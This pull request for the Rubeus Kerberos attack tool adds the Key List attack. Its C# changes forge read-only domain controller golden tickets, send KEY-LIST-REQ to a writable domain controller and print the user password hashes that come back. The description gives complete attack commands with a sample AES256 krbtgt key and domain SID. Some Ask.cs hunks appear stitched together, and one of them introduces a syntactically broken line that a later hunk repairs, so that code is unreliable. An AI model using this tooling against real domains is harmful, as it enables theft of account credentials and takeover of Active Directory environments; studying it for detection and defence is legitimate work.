### PR TITLE
Kerberos Key-List-Request and Replies

### DIFF
--- a/README.md
+++ b/README.md
@@ -552,6 +552,8 @@ The `/printargs` flag will print the arguments required to forge a ticket with t
 
 Using a KDC proxy ([MS-KKDCP](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-kkdcp/5bcebb8d-b747-4ee5-9453-428aec1c5c38)) to make the request is possible using the `/proxyurl:URL` argument. The full URL for the KDC proxy is required, eg. https://kdcproxy.exmaple.com/kdcproxy
 
+The `/keyList` flag was implemented for Kerberos [Key List Requests](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/732211ae-4891-40d3-b2b6-85ebd6f5ffff). These requests must utilise a forged partial TGT from a read-only domain controller in the `/ticket:BASE64|FILE.KIRBI` parameter, further details on this forged TGT in the [golden](#golden) section. Furthermore, the `/spn:x` field must be set to the KRBTGT SPN within the domain, eg. KRBTBT/domain.local.
+
 Requesting a TGT for dfm.a and then using that ticket to request a service ticket for the "LDAP/primary.testlab.local" and "cifs/primary.testlab.local" SPNs:
 
     C:\Rubeus>Rubeus.exe asktgt /user:dfm.a /rc4:2b576acbe6bcfda7294d6bd18041b8fe
@@ -1350,6 +1352,8 @@ The **golden** action will forge a TGT for the user `/user:X` encrypting the tic
 The `/oldpac` switch can be used to exclude the new *Requestor* and *Attributes* PAC_INFO_BUFFERs, added in response to CVE-2021-42287.
 
 The `/extendedupndns` switch will include the new extended UpnDns elements. This involved adding _2_ to the Flags, as well as containing the samaccountname and account SID.
+
+The `/rodcNumber:x` parameter was added to perform kerberos [Key List Requests](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/732211ae-4891-40d3-b2b6-85ebd6f5ffff). The value of this parameter is the number specified after krbtgt_x the `msDS-KrbTgtLink` attribute of the read-only domain controller, eg. krbtgt_12345 would be 12345. This request requires certain flags which can be set using `/flags:forwardable,renewable,enc_pa_rep`. The key (`/des:X`, `/rc4:X`, `/aes128:X` or `/aes256:X`) used to encrypt is the KRBTGT_x accounts key. Further information can be found on Elad Shamir's blog post [here](https://posts.specterops.io/at-the-edge-of-tier-zero-the-curious-case-of-the-rodc-ef5f1799ca06), 
 
 Forging a TGT using the `/ldap` flag to retrieve the information and the `/printcmd` flag to print a command to forge another ticket with the same PAC information:
 

--- a/Rubeus/Commands/Asktgs.cs
+++ b/Rubeus/Commands/Asktgs.cs
@@ -27,9 +27,13 @@ namespace Rubeus.Commands
             bool u2u = false;
             string targetUser = "";
             bool printargs = false;
-
+            bool keyList = false;
             string proxyUrl = null;
 
+            if (arguments.ContainsKey("/keyList"))
+            {
+                keyList = true;
+            }
             if (arguments.ContainsKey("/outfile"))
             {
                 outfile = arguments["/outfile"];
@@ -164,14 +168,14 @@ namespace Rubeus.Commands
                 {
                     byte[] kirbiBytes = Convert.FromBase64String(kirbi64);
                     KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
-                    Ask.TGS(kirbi, service, requestEnctype, outfile, ptt, dc, true, enterprise, false, opsec, tgs, targetDomain, servicekey, asrepkey, u2u, targetUser, printargs, proxyUrl);
+                    Ask.TGS(kirbi, service, requestEnctype, outfile, ptt, dc, true, enterprise, false, opsec, tgs, targetDomain, servicekey, asrepkey, u2u, targetUser, printargs, proxyUrl, keyList);
                     return;
                 }
                 else if (File.Exists(kirbi64))
                 {
                     byte[] kirbiBytes = File.ReadAllBytes(kirbi64);
                     KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
-                    Ask.TGS(kirbi, service, requestEnctype, outfile, ptt, dc, true, enterprise, false, opsec, tgs, targetDomain, servicekey, asrepkey, u2u, targetUser, printargs, proxyUrl);
+                    Ask.TGS(kirbi, service, requestEnctype, outfile, ptt, dc, true, enterprise, false, opsec, tgs, targetDomain, servicekey, asrepkey, u2u, targetUser, printargs, proxyUrl, keyList);
                     return;
                 }
                 else

--- a/Rubeus/Commands/Golden.cs
+++ b/Rubeus/Commands/Golden.cs
@@ -60,7 +60,12 @@ namespace Rubeus.Commands
             string outfile = "";
             bool ptt = false;
             bool printcmd = false;
+            Int32 rodcNumber = 0;
 
+            if (arguments.ContainsKey("/rodcNumber"))
+            {
+                rodcNumber = Int32.Parse(arguments["/rodcNumber"]);
+            }
             // user information mostly for the PAC
             if (arguments.ContainsKey("/user"))
             {
@@ -430,7 +435,14 @@ namespace Rubeus.Commands
                     extendedUpnDns,
                     outfile,
                     ptt,
-                    printcmd
+                    printcmd,
+                    null,
+                    null,
+                    null,
+                    null,
+                    false,
+                    false,
+                    rodcNumber
                     );
                 return;
             }

--- a/Rubeus/Domain/Info.cs
+++ b/Rubeus/Domain/Info.cs
@@ -41,6 +41,9 @@ namespace Rubeus.Domain
     Retrieve a service ticket for one or more SPNs, optionally saving or applying the ticket:
         Rubeus.exe asktgs </ticket:BASE64 | /ticket:FILE.KIRBI> </service:SPN1,SPN2,...> [/enctype:DES|RC4|AES128|AES256] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/enterprise] [/opsec] </tgs:BASE64 | /tgs:FILE.KIRBI> [/targetdomain] [/u2u] [/targetuser] [/servicekey:PASSWORDHASH] [/asrepkey:ASREPKEY] [/proxyurl:https://KDC_PROXY/kdcproxy]
 
+    Retrieve a service ticket using the Kerberos Key List Request options:
+        Rubeus.exe asktgs /keyList /service:KRBTGT_SPN </ticket:BASE64 | /ticket:FILE.KIRBI> [/enctype:DES|RC4|AES128|AES256] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/enterprise] [/opsec] </tgs:BASE64 | /tgs:FILE.KIRBI> [/targetdomain] [/u2u] [/targetuser] [/servicekey:PASSWORDHASH] [/asrepkey:ASREPKEY] [/proxyurl:https://KDC_PROXY/kdcproxy]
+
     Renew a TGT, optionally applying the ticket, saving it, or auto-renewing the ticket up to its renew-till limit:
         Rubeus.exe renew </ticket:BASE64 | /ticket:FILE.KIRBI> [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/autorenew] [/nowrap]
 
@@ -71,6 +74,9 @@ namespace Rubeus.Domain
 
     Forge a golden ticket, setting values explicitly:
         Rubeus.exe golden </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> </domain:DOMAIN> </sid:DOMAIN_SID> [/dc:DOMAIN_CONTROLLER] [/netbios:NETBIOS_DOMAIN] [/dispalyname:PAC_FULL_NAME] [/badpwdcount:INTEGER] [/flags:TICKET_FLAGS] [/uac:UAC_FLAGS] [/groups:GROUP_IDS] [/pgid:PRIMARY_GID] [/homedir:HOMEDIR] [/homedrive:HOMEDRIVE] [/id:USER_ID] [/logofftime:LOGOFF_TIMESTAMP] [/lastlogon:LOGON_TIMESTAMP] [/logoncount:INTEGER] [/passlastset:PASSWORD_CHANGE_TIMESTAMP] [/maxpassage:RELATIVE_TO_PASSLASTSET] [/minpassage:RELATIVE_TO_PASSLASTSET] [/profilepath:PROFILE_PATH] [/scriptpath:LOGON_SCRIPT_PATH] [/sids:EXTRA_SIDS] [[/resourcegroupsid:RESOURCEGROUPS_SID] [/resourcegroups:GROUP_IDS]] [/authtime:AUTH_TIMESTAMP] [/starttime:Start_TIMESTAMP] [/endtime:RELATIVE_TO_STARTTIME] [/renewtill:RELATIVE_TO_STARTTIME] [/rangeend:RELATIVE_TO_STARTTIME] [/rangeinterval:RELATIVE_INTERVAL] [/oldpac] [/extendedupndns] [/printcmd] [outfile:FILENAME] [/ptt]
+
+    Forge a golden ticket for a read only domain controller (for Key List Requests):
+        Rubeus.exe golden </rodcNumber:RODC_NUM> </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> </domain:DOMAIN> </sid:DOMAIN_SID> [/dc:DOMAIN_CONTROLLER] [/netbios:NETBIOS_DOMAIN] [/dispalyname:PAC_FULL_NAME] [/badpwdcount:INTEGER] [/flags:TICKET_FLAGS] [/uac:UAC_FLAGS] [/groups:GROUP_IDS] [/pgid:PRIMARY_GID] [/homedir:HOMEDIR] [/homedrive:HOMEDRIVE] [/id:USER_ID] [/logofftime:LOGOFF_TIMESTAMP] [/lastlogon:LOGON_TIMESTAMP] [/logoncount:INTEGER] [/passlastset:PASSWORD_CHANGE_TIMESTAMP] [/maxpassage:RELATIVE_TO_PASSLASTSET] [/minpassage:RELATIVE_TO_PASSLASTSET] [/profilepath:PROFILE_PATH] [/scriptpath:LOGON_SCRIPT_PATH] [/sids:EXTRA_SIDS] [[/resourcegroupsid:RESOURCEGROUPS_SID] [/resourcegroups:GROUP_IDS]] [/authtime:AUTH_TIMESTAMP] [/starttime:Start_TIMESTAMP] [/endtime:RELATIVE_TO_STARTTIME] [/renewtill:RELATIVE_TO_STARTTIME] [/rangeend:RELATIVE_TO_STARTTIME] [/rangeinterval:RELATIVE_INTERVAL] [/oldpac] [/extendedupndns] [/printcmd] [outfile:FILENAME] [/ptt]
 
     Forge a silver ticket using LDAP to gather the relevent information:
         Rubeus.exe silver </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> </service:SPN> /ldap [/extendedupndns] [/nofullpacsig] [/printcmd] [outfile:FILENAME] [/ptt]

--- a/Rubeus/Domain/Info.cs
+++ b/Rubeus/Domain/Info.cs
@@ -12,7 +12,7 @@ namespace Rubeus.Domain
             Console.WriteLine("  |  __  /| | | |  _ \\| ___ | | | |/___)");
             Console.WriteLine("  | |  \\ \\| |_| | |_) ) ____| |_| |___ |");
             Console.WriteLine("  |_|   |_|____/|____/|_____)____/(___/\r\n");
-            Console.WriteLine("  v2.2.1 \r\n");
+            Console.WriteLine("  v2.2.2 \r\n");
         }
 
         public static void ShowUsage()

--- a/Rubeus/Rubeus.csproj
+++ b/Rubeus/Rubeus.csproj
@@ -133,6 +133,8 @@
     <Compile Include="lib\krb_structures\Authenticator.cs" />
     <Compile Include="lib\krb_structures\AuthorizationData.cs" />
     <Compile Include="lib\krb_structures\Checksum.cs" />
+    <Compile Include="lib\krb_structures\PA_KEY_LIST_REP.cs" />
+    <Compile Include="lib\krb_structures\EncryptedPAData.cs" />
     <Compile Include="lib\krb_structures\EncKDCRepPart.cs" />
     <Compile Include="lib\krb_structures\EncKrbCredPart.cs" />
     <Compile Include="lib\krb_structures\EncKrbPrivPart.cs" />
@@ -170,6 +172,7 @@
     <Compile Include="lib\krb_structures\PA_DATA.cs" />
     <Compile Include="lib\krb_structures\PA_ENC_TS_ENC.cs" />
     <Compile Include="lib\krb_structures\PA_FOR_USER.cs" />
+    <Compile Include="lib\krb_structures\PA_KEY_LIST_REQ.cs" />
     <Compile Include="lib\krb_structures\PA_PAC_OPTIONS.cs" />
     <Compile Include="lib\krb_structures\PA_S4U_X509_USER.cs" />
     <Compile Include="lib\krb_structures\PA_PK_AS_REP.cs" />

--- a/Rubeus/lib/Ask.cs
+++ b/Rubeus/lib/Ask.cs
@@ -358,12 +358,12 @@ namespace Rubeus {
                     Console.WriteLine("[*] Requesting '{0}' etype for the service ticket", requestEType);
                 }
 
-                if (!String.IsNullOrEmpty(service))
+                if (keyList)
+                    Console.WriteLine("[*] Building KeyList TGS-REQ request for: '{0}'", userName);
+                else if (!String.IsNullOrEmpty(service))
                     Console.WriteLine("[*] Building TGS-REQ request for: '{0}'", service);
                 else if (u2u)
                     Console.WriteLine("[*] Building User-to-User TGS-REQ request for: '{0}'", userName);
-                else if (keyList)
-                    Console.WriteLine("[*] Building KeyList TGS-REQ request for: '{0}'", userName);
                 else
                     Console.WriteLine("[*] Building TGS-REQ request");
 
@@ -418,6 +418,14 @@ namespace Rubeus {
                 byte[] outBytes = Crypto.KerberosDecrypt(paEType, Interop.KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, clientKey, rep.enc_part.cipher);
                 AsnElt ae = AsnElt.Decode(outBytes);
                 EncKDCRepPart encRepPart = new EncKDCRepPart(ae.Sub[0]);
+
+                // extract hash for keylist - Need null for display options
+                string keyListHash = null;
+                if (keyList)
+                {
+                    keyListHash = Helpers.ByteArrayToString(encRepPart.encryptedPaData.PA_KEY_LIST_REP.encryptionKey.keyvalue);
+                }
+                
 
                 // if using /opsec and the ticket is for a server configuration for unconstrained delegation, request a forwardable TGT
                 if (opsec && (!roast) && ((encRepPart.flags & Interop.TicketFlags.ok_as_delegate) != 0))
@@ -516,7 +524,7 @@ namespace Rubeus {
 
                     LSA.DisplayTicket(kirbi, 2, false, false, false, false, 
                         string.IsNullOrEmpty(servicekey) ? null : Helpers.StringToByteArray(servicekey), string.IsNullOrEmpty(asrepkey) ? null : Helpers.StringToByteArray(asrepkey),
-                        ,,,string.IsNullOrEmpty(Helpers.ByteArrayToString(encRepPart.encryptedPaData.PA_KEY_LIST_REP.encryptionKey.keyvalue)) ? null : encRepPart.encryptedPaData.PA_KEY_LIST_REP.encryptionKey.keyvalue;
+                        null,null,null,string.IsNullOrEmpty(keyListHash) ? null : Helpers.StringToByteArray(keyListHash));
                 }
 
                 if (!String.IsNullOrEmpty(outfile))

--- a/Rubeus/lib/Ask.cs
+++ b/Rubeus/lib/Ask.cs
@@ -317,7 +317,7 @@ namespace Rubeus {
             }
         }
 
-        public static void TGS(KRB_CRED kirbi, string service, Interop.KERB_ETYPE requestEType = Interop.KERB_ETYPE.subkey_keymaterial, string outfile = "", bool ptt = false, string domainController = "", bool display = true, bool enterprise = false, bool roast = false, bool opsec = false, KRB_CRED tgs = null, string targetDomain = "", string servicekey = "", string asrepkey = "", bool u2u = false, string targetUser = "", bool printargs = false, string proxyUrl = null)
+        public static void TGS(KRB_CRED kirbi, string service, Interop.KERB_ETYPE requestEType = Interop.KERB_ETYPE.subkey_keymaterial, string outfile = "", bool ptt = false, string domainController = "", bool display = true, bool enterprise = false, bool roast = false, bool opsec = false, KRB_CRED tgs = null, string targetDomain = "", string servicekey = "", string asrepkey = "", bool u2u = false, string targetUser = "", bool printargs = false, string proxyUrl = null, bool keyList = false)
         {
             // kirbi            = the TGT .kirbi to use for ticket requests
             // service          = the SPN being requested
@@ -339,12 +339,12 @@ namespace Rubeus {
             foreach (string sname in services)
             {
                 // request the new service ticket
-                TGS(userName, domain, ticket, clientKey, paEType, sname, requestEType, outfile, ptt, domainController, display, enterprise, roast, opsec, tgs, targetDomain, servicekey, asrepkey, u2u, targetUser, printargs, proxyUrl);
+                TGS(userName, domain, ticket, clientKey, paEType, sname, requestEType, outfile, ptt, domainController, display, enterprise, roast, opsec, tgs, targetDomain, servicekey, asrepkey, u2u, targetUser, printargs, proxyUrl, keyList);
                 Console.WriteLine();
             }
         }
 
-        public static byte[] TGS(string userName, string domain, Ticket providedTicket, byte[] clientKey, Interop.KERB_ETYPE paEType, string service, Interop.KERB_ETYPE requestEType = Interop.KERB_ETYPE.subkey_keymaterial, string outfile = "", bool ptt = false, string domainController = "", bool display = true, bool enterprise = false, bool roast = false, bool opsec = false, KRB_CRED tgs = null, string targetDomain = "", string servicekey = "", string asrepkey = "", bool u2u = false, string targetUser = "", bool printargs = false, string proxyUrl = null)
+        public static byte[] TGS(string userName, string domain, Ticket providedTicket, byte[] clientKey, Interop.KERB_ETYPE paEType, string service, Interop.KERB_ETYPE requestEType = Interop.KERB_ETYPE.subkey_keymaterial, string outfile = "", bool ptt = false, string domainController = "", bool display = true, bool enterprise = false, bool roast = false, bool opsec = false, KRB_CRED tgs = null, string targetDomain = "", string servicekey = "", string asrepkey = "", bool u2u = false, string targetUser = "", bool printargs = false, string proxyUrl = null, bool keyList = false)
         {
 
             if (display)
@@ -362,6 +362,8 @@ namespace Rubeus {
                     Console.WriteLine("[*] Building TGS-REQ request for: '{0}'", service);
                 else if (u2u)
                     Console.WriteLine("[*] Building User-to-User TGS-REQ request for: '{0}'", userName);
+                else if (keyList)
+                    Console.WriteLine("[*] Building KeyList TGS-REQ request for: '{0}'", userName);
                 else
                     Console.WriteLine("[*] Building TGS-REQ request");
 
@@ -371,7 +373,7 @@ namespace Rubeus {
             if (u2u && tgs != null && String.IsNullOrEmpty(service))
                 service = tgs.enc_part.ticket_info[0].pname.name_string[0];
 
-            byte[] tgsBytes = TGS_REQ.NewTGSReq(userName, domain, service, providedTicket, clientKey, paEType, requestEType, false, targetUser, enterprise, roast, opsec, false, tgs, targetDomain, u2u);
+            byte[] tgsBytes = TGS_REQ.NewTGSReq(userName, domain, service, providedTicket, clientKey, paEType, requestEType, false, targetUser, enterprise, roast, opsec, false, tgs, targetDomain, u2u, keyList);
 
             byte[] response = null;
             string dcIP = null;
@@ -513,7 +515,8 @@ namespace Rubeus {
                     KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
 
                     LSA.DisplayTicket(kirbi, 2, false, false, false, false, 
-                        string.IsNullOrEmpty(servicekey) ? null : Helpers.StringToByteArray(servicekey), string.IsNullOrEmpty(asrepkey) ? null : Helpers.StringToByteArray(asrepkey));
+                        string.IsNullOrEmpty(servicekey) ? null : Helpers.StringToByteArray(servicekey), string.IsNullOrEmpty(asrepkey) ? null : Helpers.StringToByteArray(asrepkey),
+                        ,,,string.IsNullOrEmpty(Helpers.ByteArrayToString(encRepPart.encryptedPaData.PA_KEY_LIST_REP.encryptionKey.keyvalue)) ? null : encRepPart.encryptedPaData.PA_KEY_LIST_REP.encryptionKey.keyvalue;
                 }
 
                 if (!String.IsNullOrEmpty(outfile))

--- a/Rubeus/lib/ForgeTicket.cs
+++ b/Rubeus/lib/ForgeTicket.cs
@@ -74,7 +74,8 @@ namespace Rubeus
             string s4uProxyTarget = null,
             string s4uTransitedServices = null,
             bool includeAuthData = false,
-            bool noFullPacSig = false
+            bool noFullPacSig = false,
+            Int32 rodcNumber = 0
             )
         {
             // vars
@@ -971,8 +972,15 @@ namespace Rubeus
                 // initialize the ticket and add the enc_part
                 Console.WriteLine("[*] Generating Ticket");
                 Ticket ticket = new Ticket(domain.ToUpper(), sname);
-                ticket.enc_part = new EncryptedData((Int32)etype, encTicketPart, 3);
-
+                // when performing keylist attack the kvnum is shifted left 16 bits
+                if (rodcNumber == 0)
+                {
+                    ticket.enc_part = new EncryptedData((Int32)etype, encTicketPart, 3);
+                }
+                else
+                {
+                    ticket.enc_part = new EncryptedData((Int32)etype, encTicketPart, (uint)rodcNumber << 16);
+                }
                 // add the ticket
                 cred.tickets.Add(ticket);
 

--- a/Rubeus/lib/Interop.cs
+++ b/Rubeus/lib/Interop.cs
@@ -255,7 +255,9 @@ namespace Rubeus
             PA_S4U_X509_USER = 130,
             PA_PAC_OPTIONS = 167,
             PK_AS_09_BINDING = 132,
-            CLIENT_CANONICALIZED = 133
+            CLIENT_CANONICALIZED = 133,
+            KEY_LIST_REQ = 161,
+            KEY_LIST_REP = 162
         }
 
         // from https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/cd9d5ca7-ce20-4693-872b-2f5dd41cbff6

--- a/Rubeus/lib/LSA.cs
+++ b/Rubeus/lib/LSA.cs
@@ -519,7 +519,7 @@ namespace Rubeus
             }
         }
 
-        public static void DisplayTicket(KRB_CRED cred, int indentLevel = 2, bool displayTGT = false, bool displayB64ticket = false, bool extractKerberoastHash = false, bool nowrap = false, byte[] serviceKey = null, byte[] asrepKey = null, string serviceUser = "", string serviceDomain = "", byte[] krbKey = null)
+        public static void DisplayTicket(KRB_CRED cred, int indentLevel = 2, bool displayTGT = false, bool displayB64ticket = false, bool extractKerberoastHash = false, bool nowrap = false, byte[] serviceKey = null, byte[] asrepKey = null, string serviceUser = "", string serviceDomain = "", byte[] krbKey = null, byte[] keyList = null)
         {
             // displays a given .kirbi (KRB_CRED) object, with display options
 
@@ -575,6 +575,12 @@ namespace Rubeus
                 Console.WriteLine("{0}Flags                    :  {1}", indent, cred.enc_part.ticket_info[0].flags);
                 Console.WriteLine("{0}KeyType                  :  {1}", indent, keyType);
                 Console.WriteLine("{0}Base64(key)              :  {1}", indent, b64Key);
+                                  
+                // If KeyList attack then present the password hash
+                if (keyList != null)
+                {
+                    Console.WriteLine("{0}Password Hash            :  {2}", indent, userName, Helpers.ByteArrayToString(keyList));
+                }
 
                 //We display the ASREP decryption key as this is needed for decrypting
                 //PAC_CREDENTIAL_INFO inside both the AS-REP and TGS-REP Tickets when

--- a/Rubeus/lib/krb_structures/EncKDCRepPart.cs
+++ b/Rubeus/lib/krb_structures/EncKDCRepPart.cs
@@ -69,7 +69,7 @@ namespace Rubeus
                         // HostAddresses, skipped for now
                         break;
                     case 12:
-                        // encrypted-pa-data, skipped for now
+                        encryptedPaData = new EncryptedPAData(s.Sub[0]);
                         break;
                     default:
                         break;
@@ -102,7 +102,7 @@ namespace Rubeus
         public PrincipalName sname { get; set; }
 
         // caddr (optional) - skip for now
-        
-        // encrypted-pa-data (optional) - skip for now
+
+        public EncryptedPAData encryptedPaData { get; set; }
     }
 }

--- a/Rubeus/lib/krb_structures/EncryptedPAData.cs
+++ b/Rubeus/lib/krb_structures/EncryptedPAData.cs
@@ -1,0 +1,50 @@
+﻿using System;
+using Asn1;
+using System.Text;
+using System.Collections.Generic;
+
+namespace Rubeus
+{
+    public class EncryptedPAData
+    {
+        public EncryptedPAData()
+        {
+            keytype = 0;
+
+            keyvalue = null;
+        }
+
+        public EncryptedPAData(AsnElt body)
+        {
+            // Get padata-type and padata-value
+            foreach (AsnElt s in body.Sub[0].Sub)
+            {
+                switch (s.TagValue)
+                {
+                    case 1:
+                        keytype = Convert.ToInt32(s.Sub[0].GetInteger());
+                        break;
+                    case 2:
+                        keyvalue = s.Sub[0].GetOctetString();
+                        break;
+                    default:
+                        break;
+                }
+            }
+
+            // Decode the KEY-LIST-REP 
+            if (keytype == (Int32)Interop.PADATA_TYPE.KEY_LIST_REP)
+            {
+                AsnElt ae = AsnElt.Decode(keyvalue);
+                PA_KEY_LIST_REP = new PA_KEY_LIST_REP(ae);
+            }
+
+        }
+
+        public Int32 keytype { get; set; }
+
+        public byte[] keyvalue { get; set; }
+
+        public PA_KEY_LIST_REP PA_KEY_LIST_REP { get; set; }
+    }
+}

--- a/Rubeus/lib/krb_structures/PA_DATA.cs
+++ b/Rubeus/lib/krb_structures/PA_DATA.cs
@@ -64,6 +64,14 @@ namespace Rubeus {
             value = new PA_S4U_X509_USER(key, name, realm, nonce, eType);
         }
 
+        public PA_DATA(Interop.KERB_ETYPE eTYPE)
+        {
+            // KeyListAttack
+            type = Interop.PADATA_TYPE.KEY_LIST_REQ;
+
+            value = new PA_KEY_LIST_REQ(eTYPE);
+        }
+
         public PA_DATA(string crealm, string cname, Ticket providedTicket, byte[] clientKey, Interop.KERB_ETYPE etype, bool opsec = false, byte[] req_body = null)
         {
             // include an AP-REQ, so PA-DATA for a TGS-REQ
@@ -219,6 +227,17 @@ namespace Rubeus {
             else if(type == Interop.PADATA_TYPE.PK_AS_REQ) {
 
                 AsnElt blob = AsnElt.MakeBlob(((PA_PK_AS_REQ)value).Encode().Encode());
+                AsnElt blobSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { blob });
+
+                paDataElt = AsnElt.MakeImplicit(AsnElt.CONTEXT, 2, blobSeq);
+
+                AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { nameTypeSeq, paDataElt });
+                return seq;
+            }
+            else if (type == Interop.PADATA_TYPE.KEY_LIST_REQ)
+            {
+
+                AsnElt blob = AsnElt.MakeBlob(((PA_KEY_LIST_REQ)value).Encode().Encode());
                 AsnElt blobSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { blob });
 
                 paDataElt = AsnElt.MakeImplicit(AsnElt.CONTEXT, 2, blobSeq);

--- a/Rubeus/lib/krb_structures/PA_KEY_LIST_REP.cs
+++ b/Rubeus/lib/krb_structures/PA_KEY_LIST_REP.cs
@@ -1,0 +1,22 @@
+﻿using Asn1;
+using System;
+using System.Text;
+
+namespace Rubeus
+{
+    public class PA_KEY_LIST_REP
+    {
+        // KERB-KEY-LIST-REP ::= SEQUENCE OF EncryptionKey
+        public PA_KEY_LIST_REP()
+        {
+            encryptionKey = new EncryptionKey();
+        }
+        public PA_KEY_LIST_REP(AsnElt body)
+        {
+            encryptionKey = new EncryptionKey(body);
+        }
+
+        public EncryptionKey encryptionKey { get; set; }
+
+    }
+}

--- a/Rubeus/lib/krb_structures/PA_KEY_LIST_REQ.cs
+++ b/Rubeus/lib/krb_structures/PA_KEY_LIST_REQ.cs
@@ -1,0 +1,29 @@
+﻿using Asn1;
+using System;
+using System.Text;
+
+namespace Rubeus
+{
+    class PA_KEY_LIST_REQ
+    {
+        // KERB-KEY-LIST-REQ::= SEQUENCE OF Int32 -- encryption type -- 
+        public PA_KEY_LIST_REQ()
+        {
+            Enctype = (Int32)Interop.KERB_ETYPE.rc4_hmac;
+        }
+
+        public PA_KEY_LIST_REQ(Interop.KERB_ETYPE etype)
+        {
+            Enctype = (Int32)etype;
+        }
+        public AsnElt Encode()
+        {
+            AsnElt enctypeAsn = AsnElt.MakeInteger(Enctype);
+            AsnElt enctypeSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { enctypeAsn });
+            return enctypeSeq;
+        }
+
+        public Int32 Enctype { get; set; }
+
+    }
+}

--- a/Rubeus/lib/krb_structures/TGS_REQ.cs
+++ b/Rubeus/lib/krb_structures/TGS_REQ.cs
@@ -20,7 +20,7 @@ namespace Rubeus
 
     public class TGS_REQ
     {
-        public static byte[] NewTGSReq(string userName, string domain, string sname, Ticket providedTicket, byte[] clientKey, Interop.KERB_ETYPE paEType, Interop.KERB_ETYPE requestEType = Interop.KERB_ETYPE.subkey_keymaterial, bool renew = false, string s4uUser = "", bool enterprise = false, bool roast = false, bool opsec = false, bool unconstrained = false, KRB_CRED tgs = null, string targetDomain = "", bool u2u = false)
+        public static byte[] NewTGSReq(string userName, string domain, string sname, Ticket providedTicket, byte[] clientKey, Interop.KERB_ETYPE paEType, Interop.KERB_ETYPE requestEType = Interop.KERB_ETYPE.subkey_keymaterial, bool renew = false, string s4uUser = "", bool enterprise = false, bool roast = false, bool opsec = false, bool unconstrained = false, KRB_CRED tgs = null, string targetDomain = "", bool u2u = false, bool keyList = false)
         {
             TGS_REQ req;
             if (u2u)
@@ -181,6 +181,11 @@ namespace Rubeus
                 }
             }
 
+            if (keyList)
+            {
+                req.req_body.kdcOptions = Interop.KdcOptions.CANONICALIZE;
+            }
+
             // needed for authenticator checksum
             byte[] cksum_Bytes = null;
 
@@ -241,6 +246,12 @@ namespace Rubeus
             PA_DATA padata = new PA_DATA(domain, userName, providedTicket, clientKey, paEType, opsec, cksum_Bytes);
             req.padata.Add(padata);
 
+            // Add PA-DATA for KeyList request
+            if (keyList)
+            {
+                PA_DATA keyListPaData = new PA_DATA(Interop.KERB_ETYPE.rc4_hmac);
+                req.padata.Add(keyListPaData);
+            }
 
             // moved so all PA-DATA sections are inserted after the request body has been completed, this is useful when
             // forming opsec requests as they require a checksum of the request body within the authenticator and the 


### PR DESCRIPTION
Implemented code to complete the Kerberos Key List attack. This attack is completed by forging RODC (or AzureADSync RODC) TGTs and then requesting the long term key from a writable domain controller.

Example usage:
**Step 1 - Create TGT**
Generate Golden Ticket using KRBTGT_11442 account (rodcNumber + aes256 hash) to get the partial TGT for UserAllow with rid of 4234 in domain.local
```
.\Rubeus.exe golden /rodcNumber:11442  /flags:forwardable,renewable,enc_pa_rep /nowrap /outfile:Ticket.kirbi /aes256:1815C6750A6340A2326AE63FA10CE5DD3FCB4AE921A5662622543412D97D6E5A /user:UserAllow /id:4234 /domain:domain.local /sid:S-1-5-21-2085466279-113730185-1406233153
```
**Step 2 - Create and send TGS request to DC**
Now we have our forged TGT (ticket.kirbi), we use asktgs to send a keyList request to a writable domain controller for krbtgt service.
```
.\Rubeus.exe asktgs /enctype:aes256 /keyList /ticket:Ticket.kirbi /service:krbtgt/domain.local 
```

Screenshots
![image](https://user-images.githubusercontent.com/23236842/207111890-5b4d1637-8efa-420d-abb8-02cbf762e708.png)

![image](https://user-images.githubusercontent.com/23236842/207110896-f5c3d652-283a-46e9-bf44-ba99d6e5099a.png)





References:
* SecureAuth's The Kerberos Key List Attack blog is [here](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/)
* The PR for implementation in Impacket is [here](https://github.com/SecureAuthCorp/impacket/pull/1210/files#diff-0c4fb9ccf6b5047d4b99cd2e269fd2f0920672bc5414a4e8da770339df3fc387)
* MS-KILE:
    * [Key List Request](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/732211ae-4891-40d3-b2b6-85ebd6f5ffff)
    * [KERB-KEY-LIST-REQ](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/a8198db9-b537-4256-b903-80a716540398)
    * [KERB-KEY-LIST-REP](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/38a494fc-2885-47eb-b008-3a1b574f3614)
